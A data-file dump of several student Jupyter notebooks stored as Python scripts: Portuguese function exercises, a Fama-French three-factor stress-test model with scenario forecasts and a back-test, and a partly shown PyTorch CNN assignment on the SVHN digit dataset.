return resposta2\n\nnumero = int(input('Informe um número: '))\nnumero1=sucessor(numero)\nnumero2=antecessor (numero)\nprint (f'O número é {numero}\\nO sucessor é {numero1}\\nO antecessor é {numero2}') \n\n# + id=\"th0HrF6qS9qE\"\n\n\n# + [markdown] id=\"K1Ys_Su4RpeE\"\n#\n\n# + [markdown] id=\"EYoyINV7Rpjk\"\n# Faça uma função que recebe, por parâmetro, um valor inteiro e positivo e retorna quantos divisores tem esse valor.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"0exxCaAaRqSM\" outputId=\"ac109149-7a71-4ecb-cd3c-ee9994845505\"\ndef divisor (numero): \n cont=0\n for c in range(1,numero+1):\n if numero%c==0:\n cont+=1\n return cont \n\nnumero=int(input('Digite um número maior que 0: '))\nnumero1=divisor(numero)\nprint(numero1) \n\n\n# + [markdown] id=\"7hJV9h_NUFhs\"\n# Escreva uma função que recebe por parâmetro um valor inteiro e positivo N e retorna o valor double de seu fatorial\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Q5V-51OMUGHM\" outputId=\"7b8d2818-84d8-4f95-cd16-1ad33291714d\"\ndef fatorial (numero):\n resultado=1\n for c in range(1,numero+1):\n resultado*=c\n \n\n return resultado #Esse return determina qual será o valor da função definida( aqui no caso fatorial). Não sendo necessário\n #colocar o resultado em outra variável como fizemos no exemplo anterior, já que aqui só temos 1 return.\n\nnumero= int(input('Informe um número positivo: '))\nprint(f'{fatorial(numero):f}') \n","repo_name":"Rcoronetti/Google-Colab","sub_path":"Algoritimos,Exer9_py.ipynb","file_name":"Algoritimos,Exer9_py.ipynb","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"5653011374","text":"4+4\n\nName= 'RAJ'\nAGE= 45\nSALARY= 50000\n\n\na=None\n\nX=0.003\nY=4.456\nZ=-35.6\nz=23e4\n\nName = \"the Car\"\ncolor='white'\nInstitute='''the watch'''\n\nis_coding=True\nis_fun= True\nare_u_bored=False\n\nname=['Raj','Rishabh','Harpreet','Gore']\n\ncolors=['RED','GREEN','YELLOW']\n\nvals=[1,2,3.4,0.004,5,'Python']\n\nfixed_values=(1,3,5,7,11)\n\na={5,10,15,20,25}\nb={3,4,4,4,5,6,7,8,}\n\n\ncar_info={\"brand\":\"Ford\",\"Model\":\"006\",\"year\":\"002\"}\n\n\n","repo_name":"RGBRAND/Python-DS-course-at-digipodium","sub_path":"basics.ipynb","file_name":"basics.ipynb","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"3082267302","text":"# # Fama-French 3-factor Model\n\nimport pandas as pd\nimport numpy as np\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nfrom datetime import datetime\nimport statsmodels.formula.api as sm\nimport matplotlib.pyplot as plt \n\n\npd.set_option('display.max_rows', 100)\npd.set_option('display.max_columns', None)\npd.set_option('display.max_colwidth', 500)\n\n# # Estimation Stage\n\n# **Fama-French Model**\n\n# +\n#returns data\n\nwrds_return = pd.read_excel(\"wrds_data.xlsx\", sheet_name='returns')\nwrds_return = pd.DataFrame(wrds_return[wrds_return.columns[:-5]])\nwrds_return['date'] = wrds_return['Date'].apply(lambda x: datetime.strptime(x, \"%Y-%m\"))\nwrds_return.set_index('date', inplace=True)\nwrds_return.drop(columns=['Date'], inplace=True)\nwrds_return['market_premium'] = wrds_return['S&P RETURN'] - wrds_return['RISK-FREE RATE']\nwrds_return.head(4)\n\n\n# +\n#convert to quarterly frequency\n\nwrdsq_return = wrds_return.resample('Q').mean()\nwrdsq_return.reset_index(inplace=True)\nwrdsq_return['quarter_date'] = pd.PeriodIndex(wrdsq_return.date, freq='Q')\nwrdsq_return.head(3)\n\n# +\n#running stock-by-stock 3-factor Fama-French regressions\nwrdsq_return.rename(columns={'RISK-FREE RATE':'rf', 'FAMA-FRENCH SIZE FACTOR (SMB)' : 'smb', \n 'FAMA-FRENCH VALUE FACTOR (HML)': 'hml'}, inplace=True)\n\n\n#renaming firms to gett rid of space\nfor firm in wrdsq_return.columns[7:-1]:\n firm_new = firm.replace(' ', '_').replace('-', '_')\n for pattern in ['&', '__', '(', ')']:\n firm_new = firm_new.replace(pattern, '')\n wrdsq_return.rename(columns={firm: firm_new}, inplace=True)\n \nwrdsq_return.head(3)\n\n# +\n#regressing and adding coefficients\n\nrsquared = []\nfirm_parameters = {}\nfor n, firm in enumerate(wrdsq_return.columns[8:-3]): #for each firm\n firm_parameters[firm] = {}\n wrdsq_return['firm_minus_rf'] = wrdsq_return[firm] - wrdsq_return['rf']\n result = sm.ols(formula=\"firm_minus_rf ~ market_premium + smb + hml -1\", \n data=wrdsq_return).fit(cov_type='HAC', cov_kwds={'maxlags':4})\n #residual plots\n plt.plot(result.resid)\n plt.title(f\"Residual Plot from Fama-French 3 factor for {firm}\")\n plt.savefig(f'residual{n}.png')\n plt.show()\n \n #adjusted r-squared\n rsquared.append(result.rsquared_adj)\n coeffs = dict(result.params)\n for coeff in coeffs:\n firm_parameters[firm][coeff] = coeffs[coeff]\n\n\nprint('Number of firms: ', len(firm_parameters))\nfirm_parameters\n# -\n\n#adjusted R-squared values\nrsquared\n\n# +\n#sample regression result summary\n\nprint(f'OLS for firm {firm}')\nresult = sm.ols(formula=\"firm_minus_rf ~ market_premium + smb + hml -1\", \n data=wrdsq_return).fit(cov_type='HAC', cov_kwds={'maxlags':4})\nresult.summary()\n\n\n# -\n\n# **Regressing the 3 factors on historical MEVSs**\n\n# +\nmev_historic = pd.read_csv('2021-table_1a_historic_domestic.csv')\n\n#renaming column names to get rid of space and stuff\nfor column_name in mev_historic.columns:\n column_name_new = column_name.replace(' ', '_').replace('-', '_').lower()\n for pattern in ['&', '__', '(', ')']:\n column_name_new = column_name_new.replace(pattern, '')\n\n correction_dictionary = {'3': 'three', '5': 'five', '10': 'ten'}\n for pattern in ['3', '5', '10']:\n column_name_new = column_name_new.replace(pattern, correction_dictionary[pattern])\n mev_historic.rename(columns={column_name: column_name_new}, inplace=True)\n\nmev_historic.rename(columns={'date': 'Date'}, inplace=True) \nquarter_number = {'Q1': '01', 'Q2': '04', 'Q3': '07', 'Q4': '10'}\nmev_historic['date_str'] = mev_historic['Date'].apply(lambda x: x.split(' ')[0] + '-' + quarter_number[x.split(' ')[1]])\nmev_historic['date'] = pd.to_datetime(mev_historic.date_str)\nmev_historic['quarter_date'] = pd.PeriodIndex(mev_historic.date, freq='Q')\nmev_historic.drop(columns=['date', 'date_str', 'Date', 'scenario_name'], inplace=True)\nmev_historic.head(2)\n# -\n\nwrds_for_mev = wrdsq_return[['market_premium', 'smb', 'hml', 'date']]\nwrds_for_mev['quarter_date'] = pd.PeriodIndex(wrds_for_mev.date, freq='Q')\nwrds_for_mev.drop(columns=['date'], inplace=True)\nwrds_for_mev = pd.DataFrame(wrds_for_mev[wrds_for_mev['quarter_date'] >= '1976Q1'])\nwrds_for_mev.head(2)\n\n\n# +\n#check that the date ends at 2020Q4. It does\n\nwrds_for_mev.tail(2)\n\n# +\n#merge financial variables with MEVs\n\nmev_wrds_merged = mev_historic.merge(wrds_for_mev, on='quarter_date', indicator='unmatched')\nmev_wrds_merged.head(2)\n# -\n\nquery_xvars = ' + '.join(mev_wrds_merged.columns[:-5])\nquery_xvars\n\n\n# +\nvariables = ['market_premium', 'smb', 'hml']\n\nmev_regression_parameters = {}\nfor factor in variables: #for each factor\n #mev_regression_parameters[factor] = {}\n result = sm.ols(formula=\"{} ~ \".format(factor) + query_xvars + \"-1\", \n data=mev_wrds_merged).fit(cov_type='HAC',cov_kwds={'maxlags':4})\n mev_regression_parameters[factor] = dict(result.params)\n\nprint('Number of factors: ', len(mev_regression_parameters))\nmev_regression_parameters\n\n\n# +\n#sample regression on MEVs\n\nresult = sm.ols(formula=\"market_premium ~ \" + query_xvars + \"-1\", \n data=mev_wrds_merged).fit(cov_type='HAC', cov_kwds={'maxlags':4})\nresult.summary()\n\n# -\n\n# # Simulation Stage\n\n# **Predict the factors for 2020 using the scenario**\n\n# +\n#scenario1 data\n\nscenario1 = pd.read_csv('2021-table_3a_supervisory_severely_adverse_domestic.csv')\nquarter_number = {'Q1': '01', 'Q2': '04', 'Q3': '07', 'Q4': '10'}\nscenario1['date_str'] = scenario1['Date'].apply(lambda x: x.split(' ')[0] + '-' + quarter_number[x.split(' ')[1]])\nscenario1['date'] = pd.to_datetime(scenario1.date_str)\nscenario1['quarter_date'] = pd.PeriodIndex(scenario1.date, freq='Q')\nscenario1.drop(columns=['date_str', 'Date', 'Scenario Name', 'date'], inplace=True)\nscenario1 = scenario1[scenario1['quarter_date'] < '2022Q1']\n\n\n#change names\nfor column_name in scenario1.columns:\n column_name_new = column_name.replace(' ', '_').replace('-', '_').lower()\n for pattern in ['&', '__', '(', ')']:\n column_name_new = column_name_new.replace(pattern, '')\n\n correction_dictionary = {'3': 'three', '5': 'five', '10': 'ten'}\n for pattern in ['3', '5', '10']:\n column_name_new = column_name_new.replace(pattern, correction_dictionary[pattern])\n scenario1.rename(columns={column_name: column_name_new}, inplace=True)\n\n\nscenario1\n\n\n# +\ndef predict_factors_2022(row, dict_coeffs):\n '''\n predict the three factors using a scenario.\n The scenario will be in the dataset the row\n of which is passed in the apply function. \n \n dict_coeffs contains the regression coefficients\n from regressing factors on historical MEV\n data.\n '''\n data_row = dict(row)\n results = {}\n for factor in mev_regression_parameters:\n factor_value = 0\n for variable in mev_regression_parameters[factor]:\n coeff = mev_regression_parameters[factor][variable]\n xvalue = data_row[variable]\n factor_value += coeff*xvalue\n results[factor] = factor_value\n\n return results['market_premium'], results['smb'], results['hml']\n\n\n \n\n# +\n#Predict factors. Using 3 month treasury as risk-free return\n\nscenario1['mkt_premium_hat'],\\\n scenario1['smb_hat'],\\\n scenario1['hml_hat'] = zip(*scenario1.apply(lambda x: predict_factors_2022(x, mev_regression_parameters), axis=1))\n\npredicted_factors = pd.DataFrame(scenario1[['quarter_date', 'mkt_premium_hat', 'smb_hat', 'hml_hat']])#, 'three_month_treasury_rate']])\npredicted_factors.rename(columns={'mkt_premium_hat': 'market_premium',\n 'smb_hat': 'smb',\n 'hml_hat': 'hml'}, inplace=True)#, \n #'three_month_treasury_rate': 'rf'}, inplace=True)\npredicted_factors \n\n# -\n\npredicted_factors_array = np.array(predicted_factors)\npredicted_factors_array\n\n\n# **Forecasting the Stock Returns using predicted factors from historical MEVs**\n\n# +\nforecasted_returns = {}\nfor date in [pd.Period('2021Q1', 'Q-DEC'), \n pd.Period('2021Q2', 'Q-DEC'), \n pd.Period('2021Q3', 'Q-DEC'), \n pd.Period('2021Q4', 'Q-DEC')]:\n forecasted_returns[date] = {}\n \nforecasted_returns\n\n# +\n#forecasted stock returns\n\nfor predicted_scenario in predicted_factors_array: #forecasted factors from MEV regression\n dict_predicted_values = dict(zip(predicted_factors[1:], predicted_scenario)) #make it a dictionary\n forecasted_returns[dict_predicted_values['quarter_date']] = [] #for a date, make a list\n for firm in firm_parameters: #firm with its estimated factor coefficients\n forecast_return = 0\n for variable in firm_parameters[firm]: #iterate over factor coefficients\n forecast_return += firm_parameters[firm][variable]*dict_predicted_values[variable]\n \n forecast_return += 0.1 #add in risk-free return (3 month treasury)\n forecasted_returns[dict_predicted_values['quarter_date']].append(forecast_return)\n \nscenario1_forecasts = pd.DataFrame.from_dict(forecasted_returns, orient='index')\nscenario1_forecasts.columns = list(firm_parameters.keys())\nscenario1_forecasts\n\n# +\n#return on total portfolio\n\npd.DataFrame(scenario1_forecasts.mean(axis=1)).rename(columns={0: 'Portfolio Return SC1'})\n# -\n\n# **Scenario 2**\n\n# +\n#scenario1 data\n\nscenario2 = pd.read_csv('2021-table_2a_supervisory_baseline_domestic.csv')\nquarter_number = {'Q1': '01', 'Q2': '04', 'Q3': '07', 'Q4': '10'}\nscenario2['date_str'] = scenario2['Date'].apply(lambda x: x.split(' ')[0] + '-' + quarter_number[x.split(' ')[1]])\nscenario2['date'] = pd.to_datetime(scenario2.date_str)\nscenario2['quarter_date'] = pd.PeriodIndex(scenario2.date, freq='Q')\nscenario2.drop(columns=['date_str', 'Date', 'Scenario Name', 'date'], inplace=True)\nscenario2 = scenario2[scenario2['quarter_date'] < '2022Q1']\n\n\n#change names\nfor column_name in scenario2.columns:\n column_name_new = column_name.replace(' ', '_').replace('-', '_').lower()\n for pattern in ['&', '__', '(', ')']:\n column_name_new = column_name_new.replace(pattern, '')\n\n correction_dictionary = {'3': 'three', '5': 'five', '10': 'ten'}\n for pattern in ['3', '5', '10']:\n column_name_new = column_name_new.replace(pattern, correction_dictionary[pattern])\n scenario2.rename(columns={column_name: column_name_new}, inplace=True)\n\n\nscenario2\n\n# +\n#predict factors\n\nscenario2['mkt_premium_hat'],\\\n scenario2['smb_hat'],\\\n scenario2['hml_hat'] = zip(*scenario2.apply(lambda x: predict_factors_2022(x, mev_regression_parameters), axis=1))\n\npredicted_factors_scenario2 = pd.DataFrame(scenario2[['quarter_date', 'mkt_premium_hat', 'smb_hat', 'hml_hat']])#, 'three_month_treasury_rate']])\npredicted_factors_scenario2.rename(columns={'mkt_premium_hat': 'market_premium',\n 'smb_hat': 'smb',\n 'hml_hat': 'hml'}, inplace=True)#, \n #'three_month_treasury_rate': 'rf'}, inplace=True)\npredicted_factors_scenario2\n\n\n# -\n\npredicted_factors_array_sc2 = np.array(predicted_factors_scenario2)\npredicted_factors_array_sc2\n\n\n# +\nforecasted_returns_sc2 = {}\nfor date in [pd.Period('2021Q1', 'Q-DEC'), \n pd.Period('2021Q2', 'Q-DEC'), \n pd.Period('2021Q3', 'Q-DEC'), \n pd.Period('2021Q4', 'Q-DEC')]:\n forecasted_returns_sc2[date] = {}\n \nforecasted_returns_sc2\n\n# +\n#forecasted stock returns\n\nfor predicted_scenario in predicted_factors_array_sc2: #forecasted factors from MEV regression\n dict_predicted_values = dict(zip(predicted_factors_scenario2[1:], predicted_scenario)) #make it a dictionary\n forecasted_returns_sc2[dict_predicted_values['quarter_date']] = []\n for firm in firm_parameters: #firm with its estimated coefficients\n forecast_return = 0\n for variable in firm_parameters[firm]: #factor coefficients\n forecast_return += firm_parameters[firm][variable]*dict_predicted_values[variable]\n \n forecast_return += 0.1 #add back risk-free rate (3 month treasury)\n forecasted_returns_sc2[dict_predicted_values['quarter_date']].append(forecast_return)\n \nscenario2_forecasts = pd.DataFrame.from_dict(forecasted_returns_sc2, orient='index')\nscenario2_forecasts.columns = list(firm_parameters.keys())\nscenario2_forecasts\n# -\n\n# ### Comparing Equally-Weighted Portfolio Returns \n\n# +\n#return on total portfolio\n\np_ret_sc1 = pd.DataFrame(scenario1_forecasts.mean(axis=1)).rename(columns={0: 'Severe'})\np_ret_sc2 = pd.DataFrame(scenario2_forecasts.mean(axis=1)).rename(columns={0: 'Baseline'})\np_ret_sc1.merge(p_ret_sc2, left_index=True, right_index=True)\n# -\n\n# ### Back Test\n\ntickers = ['BIIB', 'JNJ', 'LLY', 'MRK',\n 'PFE', 'BAC', 'C', 'GS', 'JPM',\n 'MS', 'ADM', 'CAG', 'CL', 'CPB', \n 'K', 'KHC', 'KO', 'PG', 'TSN', 'WMT']\n\nbacktest = pd.read_csv('back-test.csv')\nbacktest = backtest[backtest['TICKER'].isin(tickers)]\nbacktest['date'] = backtest['date'].apply(lambda x: datetime.strptime(str(x), \"%Y%m%d\"))\nbacktest.set_index('date', inplace=True)\nbacktest['RET'] = backtest['RET'].astype(float)\nbacktestq = backtest[['RET']].resample('Q').mean()\nbacktestq.reset_index(inplace=True)\nbacktestq['quarter_date'] = pd.PeriodIndex(backtestq.date, freq='Q')\nbacktestq = pd.DataFrame(backtestq[['quarter_date', 'RET']]).set_index('quarter_date')\nbacktestq.rename(columns={'RET': 'Realized Returns'}, inplace=True)\nbacktestq\n\n# +\n#Have all required tickers\n\nbacktest['TICKER'].unique()\n\n# +\n#comparing with our two projections\n\np_ret_sc1.merge(p_ret_sc2, left_index=True, right_index=True).merge(backtestq, left_index=True, right_index=True)\n# -\n\n# ### Back Testing using Realized Returns from WRDS\n\n# We download the realized returns for the 20 tickers from WRDS to compare our projections with the actual realized portfolio returns. The realized returns are closer to our severe scenario projections (see above), which would be inline with the market stress due to the COVID-19 pandemic. If anything, the true returns reflect that the market was under greater stress i.e., MEVs were considerably worse than those given by the Fed Severe scenario (which is also intuitive since COVID was one very big unanticipated shock)\n\n# ### Performance Testing\n\n# +\n#check stationarity in the historical portfolio\n\nplt.plot(wrdsq_return[wrdsq_return.columns[7:-2]].mean(axis=1))\nplt.title('Return of the Portfolio (Equally-Weighted)')\nplt.show()\n# -\n\n# **Comment on Stationarity:** The historical portfolio return is quite stationary over time as it is also expressed in percentage change, which usually induces stationarity in series. However, some variables in the historical and scenario MEVs could be non-stationary e.g., house price index, dow_jones_total_stock_market_index_level. Removing the trend from these series could improve performance.\n#\n\n# **Notes:**\n#\n# 1. We run stock-by-stock estimation of Fama-French 3 factor model to get $\\beta$ coefficients. We utilize the maximum available period for each stock to get better coverage. \n#\n# 2. Fama-French method would proceed in two steps. First, I estimate the 3-factor model for each stock. Then, I regress each of those three factors on historical MEVs. Using the scenario values for those MEVs, then, I forecast the factors and eventually the returns. In sum, there are two regressions (one corresponding to each step). In the first classic 3-factor regression, we get an adjusted-R squared of around ~0.30. The R-squared for the 2nd-step regression is higher and around ~0.40. I use heteroskedasticity and autocorrelation-adjusted (HAC) standard errors.\n#\n# 3. The forecasted portfolio return is lower under the 'Severe' scenario and high under the 'Baseline' scenario. This result is both intuitive and according to expectations.\n#\n# 4. The $\\beta$ coefficients should be estimated using data on both the 'normal' and 'stress' periods. The reason is as follows: using one specific state of the business cycle (i.e., boom or bust) for estimation would wrongfully capture the effect of macroeconomic shocks and label them as the effect of systemic risk, and hence generating an estimate of $\\beta$ that is specific to that time period. It is, hence, desirable to use both periods and make use of all the variation in the data to estimate the true $\\beta$\n#\n# 5. The Fama-French model is balanced when it comes to complexity and interpretability. It uses a theoretical structure (Fama-French factors) and links it back to fluctuations in the macroeconomy. CAPM, arguably, is too simple and the 'general factor model' is theory-less (a pure reduced-form structure). Fama-French (with MEVs) model seems to be a decent balance between theory and forecasting using MEVs. \n#\n# 6. Model performance would be equally affected by noise and bias in the data. Under high bias, the projected average portfolio returns would be far away from the 'true' returns. While more noise may give us the true projections, but the standard errors are going to be too large to make any confident/reliable statement.\n#\n# 7. CAPM seems to be more sensitive to the law of small numbers simply because the returns are modelled as a function of two variables. Hence, any change in those variables would change the projections by a lot. Multi-factor regression, on the other hand, models stock returns as a function of a _number_ of macroeconomic variables, making it robust to changes in any one variable. \n#\n# 8. Model selection is an important part of stress testing. In the end what matters is the _out-of-sample_ performance of a forecasting model (not part of this assignment). So, a model could have robust in-sample forecasts, but could miserably fail when it comes to out-of-sample forecasts. Therefore, choosing the 'best' model needs to incorporate some kind of out-of-sample evaluation. \n#\n# 9. The residual plots from Fama-French 3 factor model are more or less stable and stationary (i.e., the residuals have an average of 0 and oscillate around mean zero). This re-ensures that we don't have a potential model misspecification. \n\n\n\n\n","repo_name":"alanwake47/FINM-35000-Topics-in-Econ","sub_path":"CP/PSet3/fama-french-model.ipynb","file_name":"fama-french-model.ipynb","file_ext":"py","file_size_in_byte":18112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"21092164153","text":"# + [markdown] id=\"dYgpzGuMdx8-\" colab_type=\"text\"\n# #Assignment 2 - CNN over SVHN\n#\n# In this assignment you are requested to build a convolutional network and train it over the SVHN data, which is a collection of 3X32X32 images, classified into 10 digits. For more information about the dataset, you may go to \n# http://ufldl.stanford.edu/housenumbers/\n\n# + id=\"Q5w6wIzcd1LG\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 85} outputId=\"0d743272-3c3b-4868-85c3-7060ca944ac8\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n# %cd '/content/drive/My Drive/Practical topics in Machine Learning/EX2'\n\nimport os\nimport numpy as np\nimport torch\nfrom time import time\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\ntrainset = torchvision.datasets.SVHN(root='./data', split='train',\n download=True, transform=transforms.ToTensor())\n\ntestset = torchvision.datasets.SVHN(root='./data', split='test',\n download=True, transform=transforms.ToTensor())\n\n# + id=\"ytzC8AfzOK3J\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 34} outputId=\"089a0ce8-b107-4701-c22d-da0d8b91e10a\"\nlen(testset)\n\n# + id=\"92MoItRaOPzU\" colab_type=\"code\" colab={}\n# Use dataloaders for train and test (batch size is 8)\n\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=8,\n shuffle=True)\n\ntestloader = torch.utils.data.DataLoader(testset, batch_size=8,\n shuffle=False)\n\n# + id=\"nPTY-2frOTP0\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 34} outputId=\"7077e456-91fe-4d08-db73-c73df36d323c\"\n# The images are tensors of 3, 32, 32\ntrainset[0][0].shape\n\n\n# + [markdown] id=\"E6jH2cjTVnVi\" colab_type=\"text\"\n# Here is what you need to do; you are encoureged to look at notebook \"Notebook 11 - CIFAR CNN\" when trying to complete the next steps.\n#\n#\n# Write a network SVHNCnn, that has the following architecture:\n#\n# * Convolution with 10 3X3 filters\n# * Relu\n# * Max pool with 2X2\n# * Convolution with 5 3X3 filters\n# * Relu\n# * Convolution with 16 3X3 filters\n# * Relu\n# * Max pool with 2X2\n# * Convolution with 24 3X3 filters\n# * Relu\n# * Max pool with 2X2\n# * Liner, output size 128\n# * Relu\n# * Liner, output size 64\n# * Relu\n# * Liner, output size 10\n\n# + id=\"-bgkfG-NOd5n\" colab_type=\"code\" colab={}\nclass SVHNCnn(nn.Module):\n\n def __init__(self):\n super(SVHNCnn, self).__init__()\n self.conv1 = nn.Conv2d(3, 10, 3)\n self.conv2 = nn.Conv2d(10, 5, 3)\n self.conv3 = nn.Conv2d(5, 16, 3)\n self.conv4 = nn.Conv2d(16, 24, 3)\n\n # Using Batch normalization on the convolution layers\n self.batchNorm2d_0 = nn.BatchNorm2d(10)\n self.batchNorm2d_1 = nn.BatchNorm2d(5)\n self.batchNorm2d_2 = nn.BatchNorm2d(16)\n self.batchNorm2d_3 = nn.BatchNorm2d(24)\n\n # 3 FC layers\n self.fc1 = nn.Linear(24 * 1 * 1, 128)\n self.fc2 = nn.Linear(128, 64)\n self.fc3 = nn.Linear(64, 10)\n \n def forward(self, x):\n x = F.max_pool2d(F.relu(self.batchNorm2d_0(self.conv1(x))), (2, 2))\n x = F.relu(self.batchNorm2d_1(self.conv2(x)))\n x = F.max_pool2d(F.relu(self.batchNorm2d_2(self.conv3(x))), (2, 2))\n x = F.max_pool2d(F.relu(self.batchNorm2d_3(self.conv4(x))), (2, 2))\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\n# + [markdown] id=\"ksWPM9kvYWmC\" colab_type=\"text\"\n# Write a code that trains the network with SVHN train dataset, for classification (use cross entropy, and SGD).\n# Run the network for at least 10 epochs, over the entire dataset. Make sure to print the loss over the train set as well as the **test set** over time (say, every 1000 batches, but it's up to you), so you will know where you are during training. \n#\n# Note, measuring loss of test is similar to measuring loss over the train test. However, make sure not to run the test images in back propagation. Use them only in forward and calulate the average loss over the entire test set. Since it will make the training process run slower, you should measure loss for the test set only at the end of an epoch (so overall you get 10 loss values for the test set). You are encoureged to write a different function for claculating the loss of the test set, and then call it from the training procedure.\n#\n#\n# You should collect the loss values in an array, so you can plot then into two curves, one for train and one for test.\n#\n# In addition, you should measure the time it takes you to train the network completely.\n#\n#\n\n# + id=\"LEfWQzWrOugS\" colab_type=\"code\" colab={}\ndef train(model, trainloader, testloader, criterion, optimizer, lr):\n \n train_losses, test_losses = [], []\n \n EPOCHS = 10\n\n # Count wall-clock time for the whole training process\n start_time = time()\n\n for epoch in range(EPOCHS):\n\n # Training mode\n model.train()\n\n sum_loss = 0.0\n running_loss = 0.0\n\n for batch_idx, (inputs, labels) in enumerate(trainloader):\n\n # Zero the gradients from the previous iteration\n optimizer.zero_grad()\n\n if torch.cuda.is_available():\n inputs = inputs.cuda()\n labels = labels.cuda()\n\n # Forward pass\n outputs = model(inputs)\n\n # Compute Cross entropy loss\n loss = criterion(outputs, labels)\n sum_loss += loss.item()\n running_loss += loss.item()\n\n # Back propagation- computing the gradients\n loss.backward()\n\n # Update the parameters\n optimizer.step()\n\n if (batch_idx + 1) % 1000 == 0:\n current = running_loss / 1000\n train_losses.append(current)\n print(\"Epoch: {}/{}...\".format(epoch + 1, EPOCHS),\n \"Step: {}...\".format(batch_idx + 1),\n \"Train Loss: {:.3f}...\".format(current))\n running_loss = 0.0\n\n # Compute the loss on the training set in the current epoch\n train_loss = sum_loss / len(trainloader.dataset)\n\n # Compute the loss on the test set in the current epoch\n test_loss = calculate_test_loss(model, testloader, criterion)\n test_losses.append(test_loss)\n\n print(\"Epoch: {}/{}...\".format(epoch + 1, EPOCHS),\n \"Train Loss: {:.3f}...\".format(train_loss),\n \"Test Loss: {:.3f}\".format(test_loss))\n\n # Decay the learning rate every three epochs\n if (epoch + 1) % 3 == 0:\n lr /= 2\n for group in optimizer.param_groups:\n group['lr'] = lr\n print(\"It's epoch number {} and the new lr is {}\".format(epoch + 1, group['lr']))\n\n passed_time = time() - start_time\n print('The training ended after %.3f minutes' % (passed_time / 60))\n\n return epochs_train_loss, epochs_test_loss\n\n\n\n# + id=\"LDXNMRgmHxCM\" colab_type=\"code\" colab={}\ndef calculate_test_loss(model, data_loader, criterion):\n \n # Evaluation mode\n model.eval()\n\n sum_loss = 0.0\n\n with torch.no_grad():\n \n for batch_idx, (inputs, labels) in enumerate(data_loader):\n \n if torch.cuda.is_available():\n inputs = inputs.cuda()\n labels = labels.cuda()\n\n # Forward pass\n outputs = model(inputs)\n\n # Compute Cross entropy loss\n loss = criterion(outputs, labels)\n sum_loss += loss.item()\n\n # Return the loss on the test set\n return sum_loss / len(data_loader.dataset)\n\n\n# + id=\"8f2VOhCVIZIA\" colab_type=\"code\" colab={}\ndef plot_graph(dataset, loss, folder):\n plt.title(\"Loss Over \" + dataset)\n\n label, color, ticks = (\n \"Number of batches seen / 1000\", 'blue', [i for i in range(0, 90 + 1, 9)]\n ) if dataset == 'Train' else (\"Epochs\", 'red', range(len(loss)))\n\n plt.plot(range(len(loss)), loss, label=dataset + ' Loss', color=color)\n\n plt.ylabel(\"Loss\")\n plt.xlabel(label)\n\n plt.xticks(ticks)\n plt.legend(frameon=False)\n plt.savefig(folder + '/' + \"Loss over \" + dataset + \".png\", dpi=192)\n plt.show()\n\n\n# + id=\"HvCmXl8oFcPe\" colab_type=\"code\" colab={}\ndef plot(folder_name, loss_train, loss_test):\n \n # Create a dir in the current working directory in which the generated\n # graphs will be saved\n output_dir = folder_name + \"_ results\"\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n print(\"\\t---------Results with \" + folder_name + \"---------\\n\")\n\n # Plotting the graphs for both training set and test set\n plot_graph(\"Train\", loss_train, output_dir)\n plot_graph(\"Test\", loss_test, output_dir)\n\n\n# + [markdown] id=\"Aa0sxqAhY8wA\" colab_type=\"text\"\n# Write a function that evaluates the resulted model over the entire test data of SVHN. Provide a single accuracy number.\n\n# + id=\"2DN1m6C4KaOS\" colab_type=\"code\" colab={}\n# Your code goes here\ndef calculate_accuracy(model, data_loader):\n \n correct = 0\n total = 0\n\n with torch.no_grad():\n\n for batch_idx, (inputs, labels) in enumerate(data_loader):\n\n if torch.cuda.is_available():\n inputs = inputs.cuda()\n\n # Forward pass\n outputs = model(inputs)\n outputs = outputs.detach().cpu()\n\n predictions = np.argmax(outputs.data, axis=1)\n\n total += labels.size(0)\n correct += (predictions == labels).sum().item()\n\n return 100 * correct / total\n\n\n# + [markdown] id=\"YFZXKnsqSgjy\" colab_type=\"text\"\n# # Training with a CPU \n#\n\n# + id=\"A2TlOyZGQAcA\" colab_type=\"code\" colab={}\nmodel_cpu = SVHNCnn()\n\n# + id=\"NA2JnWa_FMn6\" colab_type=\"code\" colab={}\n# Define loss function\ncriterion = nn.CrossEntropyLoss()\n\n# Define the learning rate\nlr=0.004\n\n# Define the optimizer\noptimizer = torch.optim.SGD(model_cpu.parameters(), lr=lr,momentum=0.9)\n\n# + id=\"dsMDrH-KP5jb\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} outputId=\"1b312d2e-1177-4a6a-87f1-e550d368a880\"\n# Training with CPU\ncpu_train_loss, cpu_test_loss= train(model_cpu, trainloader, testloader,criterion, optimizer,lr)\n\n# + id=\"rCl4Xx4SVArr\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 607} outputId=\"847a9650-81c9-468b-d2ae-1a2a05e298cf\"\n# Plot the loss graphs\nplot(\"CPU\",cpu_train_loss, cpu_test_loss)\n\n# + id=\"vHHaXLcpVQ6T\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 51} outputId=\"de8e2c04-8e9d-4714-e59c-4927a9d0df97\"\n# Calculate the accuracies\nprint('Accuracy on the training set: %d%%\\nAccuracy on the test set: %d%%' \n % (calculate_accuracy(model_cpu,trainloader),calculate_accuracy(model_cpu,testloader)))\n\n# + 